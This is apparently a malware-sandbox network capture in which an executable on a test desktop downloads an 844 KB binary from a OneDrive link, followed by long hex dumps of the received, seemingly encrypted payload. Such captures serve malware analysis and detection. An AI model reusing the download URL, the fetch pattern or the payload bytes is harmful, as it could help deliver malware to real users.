                                        Content-Location: https://qclcfg.sn.files.1drv.com/y4mWvQKn8A9-lLi8pDJ2mzIAfa341nW_80OcCKUuCUpg8nXLINV6nQIWQdhn8CExDNKcwSeNwu6BX-9xHYJYPpnCWo4AtPshwSIXRuz6OMttTSmhg4gKWmZNXtOqCqtZmBmi22CsfmkXoDNUcEFtTrxSdXRcmY5hfDdPUHwTDYWIxDixONCYp1MV3cNTMxcE4mg
                                        Expires: Tue, 21 Dec 2021 18:59:41 GMT
                                        Last-Modified: Wed, 22 Sep 2021 16:36:46 GMT
                                        Accept-Ranges: bytes
                                        P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                        X-MSNSERVER: SN4PPF38B6DF99D
                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                        MS-CV: ffY3BCotVkGd3OKyJLNfBA.0
                                        X-SqlDataOrigin: S
                                        CTag: aYzpENjY3NkE5QTYxRTg0MUYzITE1Ny4yNTc
                                        Etag: D6676A9A61E841F3!157.2
                                        X-PreAuthInfo: rv;poba;
                                        Content-Disposition: attachment; filename="Bkmhwqlbkulnphubkhqeoycsyqhknoi"
                                        X-Content-Type-Options: nosniff
                                        X-StreamOrigin: X
                                        X-AsmVersion: UNKNOWN; 19.758.906.2003
                                        Date: Wed, 22 Sep 2021 18:59:40 GMT
                                        Connection: close


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        1 | 192.168.2.4 | 49754 | 40.79.207.82 | 443 | C:\Users\user\Desktop\g4E1F7Lc2O.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2021-09-22 18:59:42 UTC | 16 | OUT | GET /y4m8McKW7eldeu5q_fP_bF_m4iIq9osyPE57I7rb1_kM5QoBiqAdrxu2i4qYsOeelfS41khT2ygF2f_VC8v9Gn9G6LiEo3xeFj2gjsgQ3adajTXfShfNZuLPOgblEcRWeMAIqqfjDN3FOsy9v8A4xdiV5xQBr9C6Kp1gGFU_0W7UGH2I4sJxFO9E7heD-2idKZGLE2Y9wCDd3h9KtX1_VCCjQ/Bkmhwqlbkulnphubkhqeoycsyqhknoi?download&psid=1 HTTP/1.1
                                        User-Agent: aswe
                                        Cache-Control: no-cache
                                        Host: qclcfg.sn.files.1drv.com
                                        Connection: Keep-Alive
                                        2021-09-22 18:59:42 UTC | 16 | IN | HTTP/1.1 200 OK
                                        Cache-Control: public
                                        Content-Length: 844288
                                        Content-Type: application/octet-stream
                                        Content-Location: https://qclcfg.sn.files.1drv.com/y4mWvQKn8A9-lLi8pDJ2mzIAfa341nW_80OcCKUuCUpg8nXLINV6nQIWQdhn8CExDNKcwSeNwu6BX-9xHYJYPpnCWo4AtPshwSIXRuz6OMttTSmhg4gKWmZNXtOqCqtZmBmi22CsfmkXoDNUcEFtTrxSdXRcmY5hfDdPUHwTDYWIxDixONCYp1MV3cNTMxcE4mg
                                        Expires: Tue, 21 Dec 2021 18:59:42 GMT
                                        Last-Modified: Wed, 22 Sep 2021 16:36:46 GMT
                                        Accept-Ranges: bytes
                                        P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                        X-MSNSERVER: SN4PPF028C1CB80
                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                        MS-CV: 84m6SgaHxUqN1dTx+/mcFw.0
                                        X-SqlDataOrigin: S
                                        CTag: aYzpENjY3NkE5QTYxRTg0MUYzITE1Ny4yNTc
                                        Etag: D6676A9A61E841F3!157.2
                                        X-PreAuthInfo: rv;poba;
                                        Content-Disposition: attachment; filename="Bkmhwqlbkulnphubkhqeoycsyqhknoi"
                                        X-Content-Type-Options: nosniff
                                        X-StreamOrigin: X
                                        X-AsmVersion: UNKNOWN; 19.758.906.2003
                                        Date: Wed, 22 Sep 2021 18:59:42 GMT
                                        Connection: close
                                        2021-09-22 18:59:44 UTC416INData Raw: 15 4a 4c 21 0b a5 86 88 fe a7 60 74 dc 98 5b b4 ba ac 44 9a 97 ff 77 67 78 ee 64 64 c7 b5 50 18 70 b8 68 31 b9 c3 e6 6b f9 aa 47 1e fb 6e e8 5c 73 6e 15 16 25 1b 8b 55 8f 8b 60 02 ef 69 86 05 3d 26 32 c1 ea fe 32 f7 69 0d 40 15 b4 ae bc d8 90 06 20 bb 8a 83 f1 dc 5d 58 be e2 ea ab 85 50 a0 db 8c 83 90 59 78 1a 36 ec fe f4 c0 99 66 a8 fd 26 ce e2 da 02 10 95 2c 26 22 44 6d 76 21 e6 64 51 ee 3d 79 48 1c ce d0 d1 48 b1 f8 9e e1 49 e5 3b 79 ae ba 35 76 88 ca 72 89 6c 6f 3b 98 ac 55 4c d8 12 25 b3 74 88 46 b8 f9 71 ed 00 82 9c 41 8b 62 d2 91 6d 84 47 e7 0a 29 fc f8 a5 5a aa ac d9 76 c5 ba 3f dc 38 fe a2 f5 b9 b1 5b 8e 1e da 08 6f dc 32 3f b8 e5 49 7d 12 d5 dd 63 90 7f bc 70 ed 58 5d 9c a9 4b da be c1 73 50 71 c0 be 5c 9c 88 86 05 0f f2 24 dc ad ec 7d fe 4d 36
                                        Data Ascii: JL!`t[DwgxddPph1kGn\sn%U`i=&22i@ ]XPYx6f&,&"Dmv!dQ=yHHI;y5vrlo;UL%tFqAbmG)Zv?8[o2?I}cpX]KsPq\$}M6
                                        2021-09-22 18:59:44 UTC432INData Raw: 9b 91 62 34 8d 5f 48 32 31 8f c8 ed 5e b9 3e d2 21 76 7e 80 11 09 7e 15 bf 3f 60 91 a9 70 f1 78 de b2 8b 95 b6 da 42 fd 7e 55 1a 0c 18 47 24 46 58 a3 81 4c 70 7c 5b 70 3a 44 88 78 84 c6 e5 c9 a8 28 57 9b 54 9e 01 00 16 3a 1c 3f 6f 87 2f 3c 5a 4f 62 57 b3 2b a8 c0 c0 9c 09 58 ba 74 2e dc 35 87 cf 7a 07 ad b0 22 bd 84 3d 44 6a 43 5e 36 b1 53 7e 60 01 44 12 c5 3b 42 ca b0 ab 7b 50 20 07 5e 39 f6 50 e1 fd d2 56 21 e9 ad c2 65 28 55 c4 56 c2 c0 be 2d 7a 7f aa 55 93 fd 1a 81 b7 57 76 c0 75 45 5d 0a f1 c0 b1 40 da ff 6f 10 56 83 81 46 5a 7a 61 c5 af 15 4f a2 80 b2 d0 c4 57 aa 38 ad ba 1b d8 ef 09 11 d1 5a f7 e6 90 95 93 51 31 4b bd ad e0 a8 d1 26 cb 82 31 b3 a4 68 dc cc 52 a6 48 de 88 7f 97 5f 15 e1 b3 80 b4 84 1b 82 df 13 96 7d 59 f6 1f e3 cd d4 06 12 e8 fb fa
                                        Data Ascii: b4_H21^>!v~~?`pxB~UG$FXLp|[p:Dx(WT:?o/<ZObW+Xt.5z"=DjC^6S~`D;B{P ^9PV!e(UV-zUWvuE]@oVFZzaOW8ZQ1K&1hRH_}Y
                                        2021-09-22 18:59:44 UTC448INData Raw: ab 37 b9 08 59 ab 72 86 09 30 8a a7 0e 85 ea a0 ef 09 74 a2 32 75 b8 fc c1 c9 79 b3 1d c5 53 6d 38 31 e6 e5 44 4f bd f5 98 d8 31 ad df 23 55 b0 d5 06 9f ff 21 07 dd a9 13 e8 20 0f 4f c3 0d cf 7d 9a 6b 22 ec cb 47 6d 6c 8f b6 ff be a4 09 39 2b 7e 24 f7 f2 d9 35 c3 36 e4 e6 50 65 b4 d8 e4 7a 48 e3 77 a5 14 76 e4 8f a7 18 10 08 a6 84 10 1c c9 70 67 db 23 fb 20 ae 28 c2 26 83 b2 9f 8f 8e 8f 8f 65 d5 64 a8 d8 65 ca 4e 7e de 36 53 70 03 b0 a2 3f 56 b4 6e ef 60 9b 84 61 15 e2 0f 39 a1 fe 6b eb a2 2c 4f a6 be b7 b7 8f e6 8e 6f 53 58 8c 6c 27 76 35 a7 a9 62 ff 2b e4 8c 49 f3 13 a4 a0 0a 07 41 ee 3f 43 92 8b 27 3e 94 98 48 2a 39 4f fd 84 4a 35 29 e8 3b 4a 66 28 74 01 5a 16 15 45 b6 e2 61 b0 23 92 bb 47 1b 66 30 e7 a4 46 aa 6d 8f 0b 9c cb b1 21 0e 82 fa fd eb 7c a1
                                        Data Ascii: 7Yr0t2uySm81DO1#U! O}k"Gml9+~$56PezHwvpg# (&edeN~6Sp?Vn`a9k,OoSXl'v5b+IA?C'>H*9OJ5);Jf(tZEa#Gf0Fm!|
                                        2021-09-22 18:59:44 UTC464INData Raw: 31 9d 19 7d 80 d9 b2 05 db be a8 25 ba 6b da f7 4c 57 f8 f3 fe ea e7 2e 6f 9d 7f ea 8c 5a a2 e3 73 37 80 6b 65 e7 b6 20 25 ef d5 be d1 85 b3 6a 64 68 30 de 4d b7 30 16 c9 b6 c3 e4 2f 64 d2 1b db 92 9d d6 04 d5 67 75 c2 3b c0 8f 5d e7 92 b4 4a b3 19 9e c4 47 61 ee 69 77 4b f4 94 b9 30 76 43 d2 82 6a 8e ca 10 4f 7c 23 e3 07 06 0b 54 e6 f3 48 38 db e4 b9 4e d1 32 ef aa 31 be 3b 7e 71 33 63 c5 5f 9f 6f 8a 0a fd 31 11 38 4e f8 08 b5 a0 a8 88 51 ab 7a 86 76 f1 f1 a6 5c f1 86 bf ab a7 75 83 3d fc 27 25 4a 5a e8 8f 0e 56 d5 89 fe 21 78 bb fc 4e 8e b3 85 f1 f9 29 92 16 a6 10 19 98 bc 2a ed 9c 04 17 8b 91 20 fb fd f4 84 e7 3c 3f b7 59 ec 72 4f 8e 6e 5c e5 fc a8 bb 31 c6 90 cf e1 14 99 bc 45 46 f0 0e 65 61 43 cb e5 b9 17 55 32 d8 a3 ba 90 06 30 5a 16 08 08 fe fe c2
                                        Data Ascii: 1}%kLW.oZs7ke %jdh0M0/dgu;]JGaiwK0vCjO|#TH8N21;~q3c_o18NQzv\u='%JZV!xN)* <?YrOn\1EFeaCU20Z
                                        2021-09-22 18:59:44 UTC480INData Raw: 44 69 3b d6 a6 30 25 ac 4c 66 b3 c6 82 fe e8 c1 e6 d2 89 7b 4b fd 6a a2 37 db 31 ab d0 94 01 5a 97 8c 0a e3 3e 54 94 00 dd 3c 55 0c e0 a4 3a 45 f6 f4 f4 e6 d3 0e e5 57 1a 1b 8b 68 bd fe ef 5f 0c f5 77 46 6a a5 b0 53 10 f8 eb 50 7d 72 da a1 a1 a9 c4 76 cc 81 62 b6 40 4b f1 4b e1 30 2b b9 f7 6b 2e 3a 5c 8d 85 61 3c 43 f7 69 27 ad ca 9c 2f b0 51 03 45 f5 6a b9 e2 b8 6b 24 12 fc e6 db 3e 55 1c 1f 98 08 f5 74 cd 18 0a f7 7e e5 57 11 65 39 ce 83 66 ad dc bb ee d6 a0 3e 44 69 3b d6 a6 30 25 ac 4c 66 b3 c6 82 fe e8 c1 e6 d2 89 7b 4b fd 6a a2 37 db 31 ab d0 94 01 5a 97 8c 0a e3 3e 54 94 00 dd 3c 55 0c e0 a4 3a 45 f6 f4 f4 e6 d3 0e e5 57 1a 1b 8b 68 bd fe ef 5f 0c f5 77 46 6a a5 b0 53 10 f8 eb 50 7d 72 da a1 a1 a9 c4 76 cc 81 62 b6 40 4b f1 4b e1 30 2b b9 f7 6b 2e
                                        Data Ascii: Di;0%Lf{Kj71Z>T<U:EWh_wFjSP}rvb@KK0+k.:\a<Ci'/QEjk$>Ut~We9f>Di;0%Lf{Kj71Z>T<U:EWh_wFjSP}rvb@KK0+k.
                                        2021-09-22 18:59:44 UTC496INData Raw: c9 48 d6 e1 80 db 95 a1 14 08 5a 73 f0 18 bf 4d 43 52 38 e0 02 76 6b 0f ca a6 80 c4 c6 9d 1c 18 be bb 52 44 de 08 5b 81 d0 e8 73 33 06 b1 6b 5f a6 64 13 28 9e 61 9a 13 c0 61 9a 20 ac b4 e0 5e 24 c4 c5 2c 89 b1 6b fb cd b5 62 14 42 ca 30 9a 99 04 61 b1 6b b3 6f c0 cb 71 fe 88 41 b4 e1 6d 86 ba de f2 58 ae f4 d2 22 34 f9 49 57 10 4b e5 fc f2 58 67 88 12 40 19 30 54 31 d3 aa 27 13 19 30 64 1c 55 bf a5 0e be d8 eb e7 00 66 ea 79 18 b2 6c 0d 74 7b 58 26 23 2a d7 93 69 83 9a 96 e7 fe 16 b6 b5 6d da 1a e8 7c 02 62 7e 55 d9 9f 1b 3d 75 f9 f3 d4 07 e9 d8 11 e5 f2 6c 0d e4 77 d7 93 11 c0 0f c5 86 41 aa f6 99 2b c5 4b bb 5d 26 96 2f 03 65 99 b7 6a 93 24 01 e7 52 36 55 bc 63 9d 59 a7 44 d1 f6 5c 7f d0 4b 46 ba d3 d4 2a 96 a2 82 5e 3e e2 2f 03 d0 22 60 15 14 4f a3 00
                                        Data Ascii: HZsMCR8vkRD[s3k_d(aa ^$,kbB0akoqAmX"4IWKXg@0T1'0dUfylt{X&#*im|b~U=ulwA+K]&/ej$R6UcYD\KF*^>/"`O
                                        2021-09-22 18:59:44 UTC512INData Raw: 10 73 cb ee 24 f1 b2 97 7d 8f 61 e5 c4 fc 76 51 c1 10 1f 7a 1c f9 9c d6 4a b7 3b 3e be a8 be ee 57 f7 99 7f 97 7b b5 17 67 d5 d3 da 2c b0 d0 57 eb bf 18 c8 60 4f 1d 62 4b 1c ce 65 c9 c1 75 cf 94 93 63 c7 f0 2e f1 aa b0 b1 1e e5 a1 68 33 3f 59 92 cf fb 92 e0 70 21 74 2c d3 f3 ae b8 84 37 48 ed d5 a1 6e 25 4d 19 48 88 15 94 d5 c4 90 ff 98 f4 29 5d fe 3d 55 89 fb f4 25 45 0a 01 bc 8b b7 3a a2 c4 98 f4 29 5d fe 3d 55 89 fb f4 17 71 a3 46 8c e5 85 91 63 da 7c 2a ce 56 0b e8 4a b0 bf 17 6c 72 39 39 38 b8 80 13 aa b7 3a 89 fb f4 64 4f 10 12 14 14 37 2c d1 fd 8a 15 a9 35 26 e4 41 5e 1d 0f b1 2a ee 2e c6 61 d1 fa 18 c8 60 40 b4 95 15 fd f8 2c de 4d 08 02 26 d7 d6 4f 7c 5e 1d 0f b1 3c b6 b1 20 e1 c8 68 33 3f 59 e0 58 78 15 98 ff 95 42 8f 5c 7d 95 6c 79 b1 26 cf e1
                                        Data Ascii: s$}avQzJ;>W{g,W`ObKeuc.h3?Yp!t,7Hn%MH)]=U%E:)]=UqFc|*VJlr998:dO7,5&A^*.a`@,M&O|^< h3?YXxB\}ly&
                                        2021-09-22 18:59:44 UTC528INData Raw: 82 3b 58 34 85 7f 1a 73 b7 b9 8c d6 73 c7 a6 fe f1 8e 92 aa 87 7b dc 30 b9 47 03 86 70 60 65 21 e7 33 42 c8 ec 03 f8 49 2b a0 f8 4b 57 ca 80 98 60 5a a3 dc 66 2e f0 ae e4 29 0b cc 49 e6 b9 9f 50 38 22 cc 0d a8 4c ee 3f a9 ca f6 92 f5 2c 58 10 37 ba ee 3f 47 4f 38 43 78 96 14 6e bf 6d 9a e4 86 12 6f e6 12 fe a8 8d 6b ae e8 0e a8 ad 6d ea c6 16 d0 9b 37 b7 4e de 70 83 88 74 69 e1 32 a3 64 a7 54 0b cc 49 a9 65 a8 35 43 62 26 0a e1 b4 d9 8d 3f da 08 65 25 df 4c 8b b7 b7 08 61 c9 86 74 4c d5 c9 86 74 5d 9b 4a b1 38 11 c6 f8 e6 ac 4c 09 1c 73 1b cf 15 a8 e9 9a f3 e2 7d 6c 3b 58 d2 47 8e 0d b7 01 8d c5 f5 18 7f 98 81 01 81 b9 9c e1 30 ef 89 f7 ae 47 3b a4 f3 6f 3d ae b1 ff 14 2d cd e5 df c3 79 d0 6b 39 bc 61 5c e3 c4 79 30 eb d1 f2 60 4b 23 e0 7c d5 f1 26 e6 cd
                                        Data Ascii: ;X4ss{0Gp`e!3BI+KW`Zf.)IP8"L?,X7?GO8Cxnmokm7Npti2dTIe5Cb&?e%LatLt]J8Ls}l;XG0G;o=-yk9a\y0`K#|&
                                        2021-09-22 18:59:44 UTC544INData Raw: 33 0f a7 b7 af 0b 65 a7 d7 5a ef 42 cd 67 80 30 33 cf d1 15 21 55 02 ab ba 3f 56 e3 79 53 59 c7 0f ea 3b a6 3f 3f 39 3b db c8 df 84 72 a2 d1 c6 8a 78 22 5a 90 75 34 4a 3c 3b 50 ba 60 69 a0 26 65 27 3d be 35 70 40 af b8 64 d5 5a 97 3b b8 e1 bb 68 23 a6 73 f8 8d 46 65 af 4e 79 d0 53 0e 68 46 33 bb 67 b0 53 79 9d ad 4f 09 38 4e f0 28 67 34 01 e1 44 1b f4 9d 26 64 d6 66 a5 33 d4 1e 21 18 84 70 54 07 18 8c c4 77 da 59 49 eb d1 98 9b 32 bd ab b9 21 93 0b 9d e6 c2 eb 83 11 e5 4f 30 ff 77 f5 93 11 b9 1b 88 4e 11 f4 d4 1d 86 7c 0b 63 98 db 25 d4 5a 9f 20 e0 e2 b9 66 a7 c0 a6 31 0f b0 5b 62 63 23 02 21 c3 fd fc 09 1c cd f0 df 9f 5f 9f df ca 8a 18 6f 02 67 4f 83 11 0b e8 8d ff b9 ef d9 a9 41 5b 96 50 f6 2c 3b 46 9d d9 52 9e bb 80 67 f4 d6 5f 25 10 34 4a 05 9e 20 6a
                                        Data Ascii: 3eZBg03!U?VySY;??9;rx"Zu4J<;P`i&e'=5p@dZ;h#sFeNyShF3gSyO8N(g4D&df3!pTwYI2!O0wN|c%Z f1[bc#!_ogOA[P,;FRg_%4J j
                                        2021-09-22 18:59:44 UTC560INData Raw: e5 4f bf 8e 7a 85 c9 6e 81 62 21 6c f2 e5 88 31 b0 d4 5d 12 b7 d4 dc 6b e7 97 44 39 39 03 90 8e 6d 41 a2 6e e5 2c fc 35 c8 d2 91 08 24 17 c2 c4 ed a0 45 5d 64 d6 c3 a5 d0 5a 57 05 0d 67 46 db e9 ea 33 c0 76 1e 99 66 a5 16 f4 a4 33 73 88 f2 b8 6a dd 39 19 51 d6 70 44 a4 3b 93 4a af 11 a8 de 67 4f 18 c7 09 30 33 37 3c d3 fe 01 51 e6 af 3b 1f 56 f4 9f e7 b3 be 11 0a db c8 fb 08 80 43 8a 31 78 dd 67 3b bd 5f d8 3d 29 d6 a6 f5 ef a1 a4 94 e7 08 e4 0d af c5 46 97 19 5a 6f 41 5f c7 c1 b3 8e 0d b9 33 69 e6 85 a9 be 12 bb 8a 95 d5 92 5c 2b e6 cd 55 02 07 1c d3 63 53 49 ad a1 d0 f9 51 e6 80 ec 13 af c6 0e 1a c8 52 39 bc 61 f5 24 c3 20 ce 4f 8c 6a c8 ff 2e 93 f8 ae 33 c4 24 6b 51 7c 1b 86 74 09 92 89 93 01 5b f2 39 15 a7 fc 45 99 e5 16 fa 99 e1 47 3b 7f 0d ec 12 59
                                        Data Ascii: Oznb!l1]kD99mAn,5$E]dZWgF3vf3sj9QpD;JgO037<Q;VC1xg;_=)FZoA_3i\+UcSIQR9a$ Oj.3$kQ|t[9EG;Y
                                        2021-09-22 18:59:44 UTC576INData Raw: e2 d5 73 f8 ae cc 0d ec 52 eb d4 6b a9 41 5e 1d 81 69 43 6c 4e fa 71 c6 00 dc 88 fa 17 02 54 07 53 0d 13 9f e8 4a f1 de b8 61 5c 7e 63 e8 c7 41 03 33 b4 82 89 10 8c 7d f0 da c5 bd 6c 3b 72 b1 ba e6 03 ed e5 65 53 d0 9c a9 35 43 62 63 93 21 25 a3 34 85 c3 d1 f0 4c 7f 81 b0 89 a1 ef ea b0 2d 99 c9 6e bf 71 c6 07 65 ac c7 82 e3 3c 58 ef 24 35 a4 5e e2 3d 55 9e 13 f9 ef d9 29 aa 48 12 8a d0 a5 d0 16 80 67 38 49 e4 91 87 09 1f 2d b6 35 4e 90 75 32 13 52 eb d1 98 9b 2a 11 f5 e7 c8 84 f3 69 91 e7 37 b5 f6 b0 38 ca 09 e3 37 cb 00 80 ec ac 3b 6e 52 eb 81 16 7f 1a 87 73 46 17 ff 51 72 a1 2f 36 c5 fe f9 64 fa fa 8e 7a 64 01 3a 9e 56 f4 9b 69 30 35 77 a7 fc f3 1d f3 a6 81 01 fb 9e a9 2b 7d 1e 6e be 81 6c b6 dd d8 27 25 21 4c 09 1c 73 a4 33 f8 92 73 65 87 1e 91 0c 6a
                                        Data Ascii: sRkA^iClNqTSJa\~cA3}l;reS5Cbc!%4L-nqe<X$5^=U)Hg8I-5Nu2R*i787;nRsFQr/6dzd:Vi05w+}nl'%!Ls3sej
                                        2021-09-22 18:59:44 UTC592INData Raw: 4d be 65 7c d5 a1 2f 35 ca e1 7d 6a 27 50 fe 7a 5a 15 58 ae 4c ef ac c5 42 e4 35 41 a5 b8 e1 bb 6a 18 1a 00 50 fe 78 79 5e 97 e6 b9 47 69 5d 5d 10 74 38 da 30 fe 8c 81 e9 cf ab ad 8f 83 ef 6b b0 a5 38 ca 09 e1 8b 41 de 26 d6 22 61 23 71 b2 d4 1f 11 da b2 ee a7 b7 85 79 8e d5 a1 6f 4f bf 2a aa 73 08 3a 0e 5d 9f 5e dd 37 b7 a1 14 5c f0 5c 18 86 34 42 6b b6 a9 81 6d 41 a1 d0 f8 85 31 b0 08 ea 1c 4d f3 21 19 32 e3 ff 76 92 86 25 df bf fa 71 c6 02 14 fb 7f 75 0c 6a 37 4a c9 06 d6 b3 95 4e a4 e9 91 56 2f 32 36 1b 7e 28 e1 bf 9a 84 74 c4 fc 76 68 bc 02 54 42 6b 6f 49 60 54 03 ae f7 eb d1 a1 b1 ba e6 03 5d 4d f3 14 48 ae e9 b0 0b 6d f5 3f d2 1a 88 40 1d e7 c8 41 d5 71 39 4c 7d e1 fe 5f 77 72 49 05 db c4 ac c7 c1 85 d6 9b 72 11 b5 d0 16 c5 f5 ef 8b 00 40 50 a6 fa
                                        Data Ascii: Me|/5}j'PzZXLB5AjPxy^Gi]]t80k8A&"a#qyoO*s:]^7\\4BkmA1M!2v%quj7JNV/26~(tvhTBkoI`T]MHm?@Aq9L}_wrIr@P
                                        2021-09-22 18:59:44 UTC608INData Raw: 41 5e 1d 0f b3 a7 6c 3b 13 28 9b dd b2 d6 2b 2d 71 66 ea 2a c7 eb 97 69 d9 cc 45 6e 40 f1 5e 1d 0f f0 dc 30 b8 e1 bb 68 33 3e 28 a7 3e eb 2e b4 db 92 8e c6 10 e7 bc 82 0c 03 b3 1e 97 19 03 56 0b e8 4a 71 c6 00 50 fe 39 ae c0 f3 a0 7d 89 04 58 10 3f 59 d2 0a 59 f7 87 8f 7c 0d 81 9b 4d 3e de 34 e8 4a f1 de 34 41 5e 1d 0f f0 1f e2 6d be ad b8 61 5c 18 86 5b 96 d4 ba 7e 17 6c 54 41 5a 14 53 05 db ae cc 8d 03 d6 23 1c cf 4d 04 58 52 da 40 24 9e a9 29 29 68 f4 f4 10 1d 60 67 c4 92 eb a3 55 d9 a3 34 e6 46 e8 4a f1 5e 1d 0f f0 5c 18 84 71 c6 42 39 e8 b5 5b 96 ce 11 b5 4b 73 af 2b 41 3c b2 ba a3 33 3f 7f e5 c4 fc 77 53 85 f2 60 21 5a ec 03 28 a7 3c b7 a1 2f 36 95 15 bd 7c 5e 78 32 d2 57 e9 ad 3b 14 73 cb ae cc 0d ec 53 05 db ae cc 0d ec 53 84 8e 86 74 2d cd 8f 08
                                        Data Ascii: A^l;(+-qf*iEn@^0h3>(>.VJqP9}X?YY|M>4J4A^ma\[~lTAZS#MXR@$))h`gU4FJ^\qB9[Ks+A<3?wS`!Z(</6|^x2W;sSSt-
                                        2021-09-22 18:59:44 UTC624INData Raw: ef ad 81 17 42 94 5b 68 3f 1c 07 df b7 5f 70 ca 06 a2 34 9f 74 e8 ef 7c fb 0c e1 5f ea c2 a0 fb fc 33 b4 26 5e d1 1b e3 7f d6 f1 ed 1d 84 8f f7 8b 21 f0 48 ab ce 41 ba a3 b9 34 3e 28 c6 2f de 20 d3 17 02 54 07 73 46 e7 ca f6 ea 46 9c a4 b6 dd b2 48 56 8b ed a1 f4 e1 43 e9 33 c0 4a fa 99 0a 23 97 e9 47 b2 5f c8 52 50 1a 4c 75 23 97 4c 35 1e 74 c6 5b c8 5b 66 c5 81 15 2c 79 31 f8 92 72 83 91 e4 bd 29 a2 b1 11 84 15 95 05 52 67 e9 95 4f bc d9 59 79 27 d9 78 b0 39 8f f7 15 84 14 93 ed 90 01 d2 59 e3 f7 83 fe f3 86 2d 6b e3 7f d6 cd 64 d5 5d 49 6c d2 d9 56 f5 9c ad a1 d3 d9 22 48 de 34 82 1a a3 5c 08 e8 2e ed 8c db 6e 73 34 3e 28 dc b5 54 f3 af b1 aa 86 8b ef 8a 82 73 40 1d 84 8c d4 94 58 9b 72 ad 0c e7 38 8f 21 d8 24 5c 33 d7 f0 77 23 49 e4 0d af c5 92 cb a2
                                        Data Ascii: B[h?_p4t|_3&^!HA4>(/ TsFFHVC3J#G_RPLu#L5t[[f,y1r)RgOYy'x9Y-kd]IlV"H4\.ns4>(Ts@Xr8!$\3w#I
                                        2021-09-22 18:59:44 UTC640INData Raw: 75 cf 95 95 93 9a f0 5c 5d a1 97 1c 3a c1 8a 80 25 b6 35 13 f9 ef d8 a7 ba 6d ee 57 cb b1 e8 4f cb 84 80 36 3a c6 8b 39 c7 72 c2 a1 ec 08 3f a9 10 8c 89 70 82 e0 ea c4 f5 92 4e 7e 9c 5b 7c 62 ce 19 45 ed 06 d6 d3 17 d8 ac 91 5f 5f 14 b8 ba b8 be 1e c0 0c 62 ad 8e 0d 3f d2 13 8c 41 da d3 63 42 bf 99 16 c3 f2 b3 dd bc 9f 29 d7 26 c5 78 22 9b dc b3 30 bc 99 95 73 33 b4 03 5d cc 5b c5 bd 37 16 70 15 02 5c 93 d7 2e 67 3b 59 e7 08 e5 3b af a4 26 4b 7b 9f a0 7e e8 ba 6d 64 a1 79 8b 6f 01 8f 51 db f0 ac 96 68 3b db 6d 35 bf 24 15 f7 9e 69 31 62 d9 56 f5 5a fc b5 d0 43 6f b7 5f 9f da 2c 8d 03 d6 dc c0 d6 27 65 27 d9 ec d8 0e 1b cb 0e 91 f3 5a e3 57 48 66 2e b4 69 a2 0b 21 2b 7d 1d 4a 7a 4c 82 9d a3 c4 77 d3 9c 35 18 6c f8 e6 65 d8 63 f0 67 b0 5b 96 d2 3c 8b 5e 32
                                        Data Ascii: u\]:%5mWO6:9r?pN~[|bE__b?AcB)&x"0s3][7p\.g;Y;&K{~mdyoQh;m5$i1bVZCo_,'e'ZWHf.i!+}JzLw5lecg[<^2
                                        2021-09-22 18:59:44 UTC656INData Raw: bd e7 1b 80 af c5 7e 63 67 9a 48 e9 8a f6 0f a0 a7 7a e5 cb db a6 fc c9 89 d9 dc 20 c4 bb 9e 51 0b 1a 03 0f 7b 8b a9 12 b7 d4 1f 1b c9 db f7 b0 d0 16 80 87 65 53 85 f2 60 c5 fd 73 1b 80 ad c2 2f bd 3d 5d d6 a8 ef d5 ec d8 76 ae 81 63 b6 a9 41 5e 1d 0f 12 cf 17 64 d5 ec db fd a9 ad c2 a2 72 12 29 73 92 71 3b 1c e0 d1 67 64 94 f5 24 15 f5 a9 fe 75 1f 98 9b 22 55 13 11 f1 98 10 15 ad 43 24 21 17 1d e4 be 13 b5 d5 49 90 5e a3 52 c0 78 52 27 69 3e 07 54 07 df 78 ed 3d 51 c6 8b 99 4e fe 5e 59 19 f9 10 84 e5 2c 73 40 0f 7b f6 17 02 54 87 f6 25 5b 17 0b 97 19 06 dd b2 9c df 36 9e dc 20 c4 bf 87 06 0c 95 1d 84 b3 dd 64 a1 f7 60 d3 17 fa b5 d8 71 95 15 f9 2d 6f 9b 79 d8 27 25 f8 fe 85 f2 60 21 c4 7f 6e bf 3c 59 42 6b 61 28 f5 ef 8c 0a 34 d9 dd b2 d4 1f 13 23 a4 35
                                        Data Ascii: ~cgHz Q{eS`s/=]vcA^dr)sq;gd$u"UC$!I^RxR'i>Tx=QN^Y,s@{T%[6 d`q-oy'%`!n<YBka(4#5
                                        2021-09-22 18:59:44 UTC672INData Raw: 58 d8 a4 b5 b0 d8 6d 37 81 da d3 54 84 7a 2f 04 63 b9 8f 09 f7 a9 87 36 f6 61 d6 2b 5f a4 65 27 2d 45 ef da 58 d0 93 ee aa 01 bd 84 20 65 e9 41 52 74 b2 c4 8b 00 af b3 97 9f c3 2f 66 de 71 4b 53 f0 5c 10 0c e9 8a 96 57 bd 68 46 ec 24 a5 c3 f2 68 46 63 a4 eb 5a 43 34 92 7e a7 bf 9d ad 1c 8d 43 ef 1a 48 66 ed d5 a1 2f 32 05 db ee da 2c b4 1b 56 cb b8 0d 67 e5 54 c4 a2 4e 07 53 06 b5 a4 6c 85 94 ab 03 5d 4d f3 12 fc 20 05 18 da d3 61 2f a1 c7 7d 3a 70 22 a2 f7 60 f7 60 d1 13 af 8e 0d 2f 6d e0 66 3e 13 7a a5 c5 bc 3b b8 b1 16 c3 f4 32 63 5f cf 4c 01 dd c6 c0 76 55 fc 80 e2 fd cb 89 10 8c 7e 9c 20 7d 73 0a ee 9f 00 5c 3c 9f a0 7d ca 1b 75 c3 5d df 8c 87 8a bf 4a f5 c3 2d b9 74 0e e5 32 8e 84 9b d2 91 f3 1d f0 f7 03 44 25 ab 8d 28 af 6a 7b 57 5e 36 d1 e6 4e de
                                        Data Ascii: Xm7Tz/c6a+_e'-EX eARt/fqKS\WhF$hFcZC4~CHf/2,VgTNSl]M a/}:p"``/mf>z;2c_LvU~ }s\<}u]J-t2D%(j{W^6N
